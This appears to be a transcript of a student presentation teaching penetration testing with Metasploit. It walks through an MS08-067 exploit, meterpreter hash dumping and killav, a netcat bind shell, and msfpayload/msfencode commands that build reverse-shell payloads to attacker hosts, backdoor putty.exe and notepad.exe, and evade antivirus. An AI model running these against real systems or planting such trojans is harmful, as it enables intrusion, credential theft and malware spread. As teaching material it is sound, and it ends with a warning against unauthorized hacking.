Metasploit: Pwnage and Ponies

The Metasploit Framework● Vast collection of exploits, payloads and encoders.● Modules for vulnerability scanning and information gathering.● Modules for exploitation and session management.● Modules for post exploitation, pivoting and getting all up in ur base.

BasicsExploits and PayloadsBy exploiting part of a system you interact with it in a manner not anticipated by the developers withthe end goal of getting your own code(payload)/logic to execute.Pentesting == Legal Le Hacking ● PTES ● Watered down process ○ Information Gathering ■ port scans, service enumeration, mapping the attack vector. ■ Testing payloads against AV, making sure everything is ready. ○ Exploitation ■ Attacking hosts. ■ Compromise from any angle. ○ Post Exploitation ■ Pivot -> back to information gathering -> Exploitation ● This time should be faster ● Password re-use ● Passwords to crack ● pass the hash/token ● You might already have DA, so just go and find what youre after.

Different kinds of Pentest● Web Applications ○ See OWASP ○ SQLi, XSS, Csrf, directory traversal, broken authentication, session management, access controls, reflected attacks, breaking application logic, client side attacks, information disclosure● Footprint ○ What hosts/services are visible to public networks, information disclosure, forgotten hosts, incorrectly configured hardware.● Infrastructure ○ Attacking hosts on a network, often internal to an organization or hosts found during the footprint. ○ Targeting hosts - OS and services (out dated/unpatched), weak password, incorrectly configured applications, zero days. ○ Targeting infrastructure - Routers and switches, IDS/IPS capabilities

nmap primer● nmap is a port scanner and OS/service fingerprinting tool.● It has become even more, welcome the NSE ○ Vuln checking and much more.Basic Scanning:nmap -sS 10.0.0.1-100 -p80nmap -sS -O -A 10.0.0.55nmap -oX - 10.0.0.1/24In msfconsole (once you have a database connected)msf > db_connect <username>:<password>@127.0.0.1/my_msf_dbCheck that you are connected by using:msf > db_statusdb_nmap <options>

Interacting with MetasploitmsfconsoleMost used, feature rich, well supported. This is where the magic happens, make sure you run it asroot.root@bt5:/# msfconsolemsf >msfcliFocused towards scripting and interaction with other command line tools. Sexy one liners.armitageThe metasploit GUI, nice for fuzzing but lets stick to msfconsole.Some of the other components you might use:msfpayload, msfencode, msfvenomOther bits of awesome:karmasploit, SET, Wmap

Metasploit DBFirst create a user and databaseroot@bt5:/# su postgrespostgres@bt5:/# createuser foobar -PEnter password for new role:Enter it again:Shall the new role be a superuser? (y/n) nShall the new role be allowed to create databases? (y/n) nShall the new role be allowed to create more new roles? (y/n) npostgres@bt5:/# createdb --owner=foobar foo_dbThen in msfconsole conenct to the databasemsf > db_connect foobar:<password>@127.0.0.1/foo_dbFrom now on you can work with the database in msfconsole, db_nmap will save nmap results to thedatabase automaticly

Basic Commands● use <module> ○ info ○ show options ○ set <option> <value>● show ○ payloads ○ exploits ○ auxiliary ○ options● search ○ string that will make your day, "show vnc"● back

Brute Force AttacksLets do a brute force dictionary attack on mysql server(s)First step is to find hosts running mysqlnmap -sV -p3306 --open <IP Range>If that returns some hosts, you can target a specific one or if your lazy,skip the nmap scan and do it directly with the metasploit mysql login scannermsf > use auxiliary/scanner/mysql/mysql_loginmsf > set USERPASS /home/me/short.txtmsf > set RHOSTS <IP || Range>msf > exploit

ShellzA shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel.Bind ShellA bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (oranyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exeReverse ShellCreates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT,this would stop you in your tracks if you tried to create a bind shell (unless you had alreadycompromised their router and setup port forwarding). So if your target does not have a publiclyaccessible IP (but you do) use a reverse shell. NAT lolwutMeterpreter ShellThe meta interpreter is a payload that provides complex and advanced functionality, all functionsloaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton ofbuilt in features that will save you a lot of time and effort. Some useful meterpreter commands arecovered later, use the following for navigating sessions.meterpreter > backgroundmsf > sessionsmsf > sessions -i <session #>

The Art of ExploitationInformation Gatheringmsf > db_nmap -sS -O -A 192.168.24.134Now lets check for MS08-067 since its running XP < sp 3msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134msf > vulns

The Art of ExploitationConfirming vulnerability, ready exploitmsf > vulns showed us that the host was indeed vulnerable[*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008-4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path StackCorruption,NSS-34476Time to use our first exploit, first search for it:msf > search ms08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path StackCorruptionTime to load the exploit:msf > use exploit/windows/smb/ms08_067_netapiUse show options || payloads to see the configuration options available.msf exploit(ms08_067_netapi) > show optionsmsf exploit(ms08_067_netapi) > show payloads

The Art of ExploitationConfigure the exploitmsf exploit(ms08_067_netapi) > set RHOST 192.168.24.134RHOST => 192.168.24.134msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(ms08_067_netapi) > show optionsEverything looks good, now run the exploit

The Art of Post ExploitationMeterpreter commands of interest:meterpreter > hashdumpmeterpreter > shellCurrent user, working directory and process IDmeterpreter > getuidmeterpreter > pwdmeterpreter > getpidNow you can migrate to a more reliable process, although not really necessary in this casemeterpreter > psmeterpreter > migrate <pid>Some funmeterpreter > screenshotmeterpreter > run vncmeterpreter > run killav

MSFpayloadUsed to create payloads on their own, sharing is caring.msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exeStealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload tolaunch in a separate thread (does not work with all executables, test, test, test)root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -ovar/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5

Multi-handler● You have a payload● The user will execute it (or you might) How do you handle the connection?● Welcome to the multi-handler.root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15LPORT=6666 E[*] Please wait while we load the module tree...[*] Started reverse handler on 10.0.0.15:6666[*] Starting the payload handler...[*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129)C:Documents and SettingsAdministratorMy DocumentsPron Downloads> :)Make sure the payload matches the one you created with msfpayload

MSFencode ● Anti-Virus Evasion ● IDS Evasion ● Taking care of bad characters in your shellcode ○ x00 and xffShow list of encoders:msfencode -lwhen in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the onlyencoder that has been rated Excellent.You can have multiple encoding runs:msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R |msfencode -e x86/shikata_ga_nai -c 5 -t raw |msfencode -e x86/alpha_upper -c 2 -t raw |... Keep on Shuffling ... |msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe

Hiding in plain sightCustom Executable Templates● msfpayload embeds payload into a default executable template (data/templates/template.exe)● While this template does change from time to time, AV companies check it.● You can however use any windows executable in place of the default. ○ Use the -x optionmsfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o/var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5PackersTool that compresses an executable and combines it with decompression code.root@bt:/# upx -5 /var/www/payload.exe

Dont be stupidPwnage is awesome● getting shellz rock.● realising you have remote code execution in a service is better than coke.● Dumping hashes and cracking them makes you laugh.Getting caught is kak● and you will get caught *cough* Sabu *cough* if you mess with systems without authorization.● Having Bubba as a cellmate WILL be uncomfortable.● No one likes a show off.● Getting kicked out of university is counter productive and ill advised.● So... DONT BE STUPID

Dont be stupidBubba loves ponies, you dont want tobe a pony...

Metasploit: Pwnage and Ponies

by Trowalts

Accessibility

Categories

Upload Details

Usage Rights

1 Embed 1

Statistics

Metasploit: Pwnage and Ponies Presentation Transcript